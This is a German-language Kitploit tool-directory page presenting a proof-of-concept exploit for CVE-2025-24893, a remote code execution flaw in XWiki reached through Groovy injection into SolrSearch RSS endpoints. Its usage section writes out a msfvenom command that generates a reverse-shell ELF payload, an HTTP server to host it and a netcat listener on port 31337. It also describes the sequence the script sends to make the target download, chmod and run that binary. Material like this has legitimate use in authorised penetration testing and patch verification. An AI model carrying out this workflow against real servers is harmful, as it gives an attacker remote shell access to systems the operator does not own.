Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893 — PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints. | Kitploit
Tools/GitHubGitHub/infinit3i/cve-2025-24893
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationCommand and Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Repository anzeigenWebseite
61vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XWiki CVE-2025-24893 Proof of Concept

Autoren: Net.Doge & Infinit3i


CVE-2025-24893 Bild



Twitter Follow


Dieses Python-Skript nutzt CVE-2025-24893, eine Remote-Code-Ausführungslücke (RCE) in XWiki aus, die durch unzureichende Sandboxing in asynchron gerenderten Groovy-Makros verursacht wird. Es ermöglicht die Ausführung beliebiger Befehle durch Einschleusung in RSS-basierte SolrSearch-Endpunkte.

📌 Funktionen

  • Einzelne Befehlsausführung über Groovy-Injection
  • Automatische Generierung von Reverse-Shell-Payloads (mit msfvenom)
  • Option zur Anpassung:
    • Remote-Ziel
    • Lokale IP-Adresse
  • HTTP-Server-Port
  • Reverse-Shell-Beacon-Port
  • Saubere Bash-Payload-Vorschauen
  • ANSI-farbcodierte interaktive TUI
  • 🚀 Verwendung

    1. Klonen oder herunterladen des Skripts.

    2. Stellen Sie sicher, dass Folgendes installiert ist:

      • msfvenom von Metasploit
      • Python 3
      • jq (wird in den Bash-Payloads verwendet)
    3. Führen Sie das Skript aus:

    root@kitploit:~
    python3 CVE-2025-24893-PoC.py
    
    1. Wählen Sie aus dem Menü:

      • Befehl ausführen – Führen Sie einen beliebigen Shell-Befehl remote aus.
      • Reverse Shell – Generieren und deployen Sie einen ELF-Reverse-Shell-Payload auf dem Ziel.
      • Einstellungen ändern – LHOST, RHOST, Server-Port oder Beacon-Port ändern.

    🧪 Reverse Shell Workflow

    1. Payload wird generiert:
    root@kitploit:~
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
    
    1. Sie werden aufgefordert, einen Python-HTTP-Server und einen netcat-Listener zu starten:
    root@kitploit:~
    python3 -m http.server 8080
    nc -lvnp 31337
    
    1. Das Skript sendet die folgende Sequenz an das Ziel:

      • Payload herunterladen
      • Ausführbar machen
      • Binärdatei ausführen

    ⚠️ Haftungsausschluss

    Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.

    📄 Referenzen

    • XWiki
    • MITRE CVE-2025-24893
    Tool herunterladen